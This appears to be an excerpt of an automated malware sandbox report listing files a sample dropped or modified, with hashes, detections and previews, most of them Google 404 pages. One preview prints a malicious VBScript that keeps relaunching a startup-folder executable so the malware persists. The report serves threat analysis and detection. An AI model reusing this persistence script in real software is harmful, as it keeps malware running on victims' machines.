                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X2MiLgmUQAddha56dfHNgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\VFNCBO.vbs

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):891
                                                                                                                                                              Entropy (8bit):5.342962320971981
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dF/UFHHmuVMHiU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFHGucXt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                              MD5:44B5015EE40F27FEF5AEB980F2EB7D38
                                                                                                                                                              SHA1:009BD9BEE2ED7BFD888B5BA094559355A37E7E64
                                                                                                                                                              SHA-256:32C6E94CD8E5133A241ADC7DCCEDFBEC0E0B3E4A0A0DB33B4C0DAE01304CC137
                                                                                                                                                              SHA-512:B422282D9E571B35D93B714B28E861DCE2451E2DE06A5485FACA702AE954E1A6F8028023173C2A772F8BCB393A465FFB4020E322A017C5AF4EB791805830E627
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_update.exe"..fileset = """C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ad4WwXh.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.252222972613939
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0FTDeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2TDe+pAZewRDK4mW
                                                                                                                                                              MD5:EC1E3C645F5A3759F54F60F37087DEFE
                                                                                                                                                              SHA1:70868B5A1617FDA7B4E99EAD2BD8705828CB7FFD
                                                                                                                                                              SHA-256:5AF831051C77E0CBC4868E8150697885ECDF2E3D26F4FA1B9C40D5552967FA7B
                                                                                                                                                              SHA-512:5598A978E400D7B4D230EC0CE4EABE9160B859FBB2C34D009790CDF26F779AFA9282125BB60C56FA03A0615844CD4B9D674D97B0EC9A2507D2415D115280EE96
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hs_TUuFy9KbClfuVnpitHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cDDuZoa.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2705153615236995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                              MD5:A7B61544DC5772465408EF804204971D
                                                                                                                                                              SHA1:9B8A146A2E3FCA5DCD0BF2B88735FDC9057F6E45
                                                                                                                                                              SHA-256:724EA135F73CF04E59925EA115FCFF04D1ED8574C180B9AEA1501D120F339AC8
                                                                                                                                                              SHA-512:1401F4BF4A9583B4C608246BA2D2B9367A0C1FD3E05AFCEDF997C3C9D595966BA2F0660B7FDC9AF468838CE316880D6FF4A81F16B90169615C91ECE85B52C068
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ziZN_BxG86KoZ0xWDW7ztA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\fzaEKTp.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.246300257376916
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0N5vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qv+pAZewRDK4mW
                                                                                                                                                              MD5:41D84EC904B6DDA1037B130FC5AC1C0B
                                                                                                                                                              SHA1:A2131E15DA9E8F7CBDDF27B803F083D2E9940AD8
                                                                                                                                                              SHA-256:EFE4AADB109B8D2FDFA0443FE15956E65F9C9F16AEFB4BB4F143C81B734E1537
                                                                                                                                                              SHA-512:926606236419BDA50E86C0E384C3EE8ACEC50F790CD36861F7BC101E30A966E82820859378582CE310E69A7257CFEA76DB0FD997BA95C4F09F675A32249EC3A2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AJmKisIG6is-otd03sGniw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\j22X19F.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.274996892100195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0kGnWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                              MD5:42548F70B176CBC247FE0408993C69E2
                                                                                                                                                              SHA1:95DAD9A508A769475DBF00E4FBCA90EB10F7F99C
                                                                                                                                                              SHA-256:87E3F8947E3F620F1CF47B0DE496668AC5DF5B48BD33CBA67269A713A2024F08
                                                                                                                                                              SHA-512:F996D637C56867B38427B6936152778A9C98476478C1563343979828273A88477CAB2F29ABFD8A6BB06AC2AB127E7F86640E9ABBE7565E1881995040A3F85265
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GYUJIYQueD9zO_HS00rCeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lMNiwHa.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.270120281243207
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0ZWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                                                              MD5:5AE5664EA89F84A76DE121E2050F2D3A
                                                                                                                                                              SHA1:D7B8176D9E600A2B0711B5CD3812FD331D0418AF
                                                                                                                                                              SHA-256:1347C60176A064632B0EB818E343739B98C1EDDC515B0934BDCD12B0112FD388
                                                                                                                                                              SHA-512:5D30225E49242527415080A0251A0A4732B341509F1B645A9CD95CF85DAD3541508598A869D4FD268592BE0BCF6C365BD80A60F035B3BCF1C2674292E28CF851
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lCHqovDb4WKm2GrDOCHhUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lovLGPu.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.268978759114767
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0C73SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T73+pAZewRDK4mW
                                                                                                                                                              MD5:218D81AB14FFC45A9849B5C41543D289
                                                                                                                                                              SHA1:E7BDADE74BE2804CBF524688BFEFAAE6C21F1C4F
                                                                                                                                                              SHA-256:D6459039292198F167530FA1929891FDD97E384BFDB2661E6BB06C6B5DDABE35
                                                                                                                                                              SHA-512:5972819700FCD9C5A45BE4AD11C11B353956AD692FD100B1AABBE53F373F9B057BE11E0E5DF9F7E6B7262AB2FEB96447193D351C253089F41DB2E77AABDE2ED2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2ykxNGj6vKONlD3D_YTmkw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\njNgGCp.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.25079964246155
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+090XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                              MD5:E292AC7CB30E3CC34A5A686C88202BA7
                                                                                                                                                              SHA1:2F817ACA49A7D9F2AC1ABA39BAF8A5C7FEBB57FA
                                                                                                                                                              SHA-256:F14D14B6FE6FF85B07BB44BF58B2DAA46BDC00CE253C4BE5F3FE3AB7EA33E8D0
                                                                                                                                                              SHA-512:C2F71D823CB3BB4A391B50CFA99540934E24E5A13DA7D92A652E2216C0E55194CBBD0BAB25816DB33554C76EE6598C6650C0346A11941BC74C602B9024933802
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sj-sK_kaHlKenot7XrPEdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\s3qk9Nf.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2704177225119935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0lrPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+CrP+pAZewRDK4mW
                                                                                                                                                              MD5:F379F5E67922D2805B3021B89E2C7607
                                                                                                                                                              SHA1:AD625204D2312B2A5E1B11AAAAB6CFC7032E02AE
                                                                                                                                                              SHA-256:403F767DFB195307C9D5C3D3ECC76D2CD63F82ECB959C660EC88E707C27AE7FA
                                                                                                                                                              SHA-512:469E71F255018B611281D7D053E1D8F2B705F8CFEA029F77CFE2F233652B6D81F15A98D22C743BE4A9E4840D059616BDFCF257AAC48A75417F667B3A31F80262
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LymD4CkM6mgW_qBRPsQlAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\yZ5Z7mI.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.263061389596769
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+051zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0z+pAZewRDK4mW
                                                                                                                                                              MD5:EECE0E6B426116577D5448FDBAE0A18A
                                                                                                                                                              SHA1:00C95A499E0E1415A6F137E12F4D455967D78D8A
                                                                                                                                                              SHA-256:A3BF8F60A047B71277729B990C9FA4D4E5EB4B416A4973CC00711E15D22F1ACF
                                                                                                                                                              SHA-512:50754DDAAB348CAAFE5BAF28D1DD88692C1EC996DD8EB6B75CAC1577A17D6622DC12E82E905FEBEA39C6BDC6E472D3D79D253541D3AE02451664B9E4A1A81662
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N4dRk1D_47M5vb96-FsIcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ysRWJ5h.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2710434385884435
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+01FnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m9+pAZewRDK4mW
                                                                                                                                                              MD5:6641FAE83480CE64A4C6DFD462E9707A
                                                                                                                                                              SHA1:1C77346C9410380F22AA467AF1A699A00EB60874
                                                                                                                                                              SHA-256:91168EE5DC43D2FDA40E72AB71DDC58F5AA7B62CA3BDE9068902074F96BE6B6A
                                                                                                                                                              SHA-512:1FE2340B30383973BBD2DD132A90940A0EE7C68A392193A2CDD061BCAAE3ECF1159CA056A0A0C236D6FD11CF0D7A287FBE843EDBE598E5E347520EF8282C9FDE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZnNRXMYBjh9Naz01kDe1qA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\zHwoSzb.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.248051232757952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0fISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                                              MD5:AA69489A506DACB2B77C1556331A01C3
                                                                                                                                                              SHA1:441E5FA672A97626EB3DA1199C47939CB5AFFA75
                                                                                                                                                              SHA-256:6749C6B28F52371F7C9B2118E5676A866586E15684E74F0A6AC6875A0155B766
                                                                                                                                                              SHA-512:407FF12B2DD794A7BED37F65AF2424C1517F36A1C49CEC329A6A0781114E345AF97658CF0C8310431B330301229E2361F75790E5DF1E8D2B6D6E0B836451C2CB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E515-Ule0xCipVTKbho-vA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~$32pAPMdc.xlsm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                              MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF646848F537BB3F9C.TMP

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):32768
                                                                                                                                                              Entropy (8bit):3.746897789531007
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):916992
                                                                                                                                                              Entropy (8bit):7.852808153468323
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:fhloDX0XOf4toB7DIXELQqXqEep4lFycqGkZj:fhloJfxBHUklI7GkB
                                                                                                                                                              MD5:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                              SHA1:CEF294ECB4F41DD4970A918550084D30705A1A3B
                                                                                                                                                              SHA-256:F5E48B46D31D16B783F2C91A516562EA9AED19F1D4A6DE820962C6B9A592B2CE
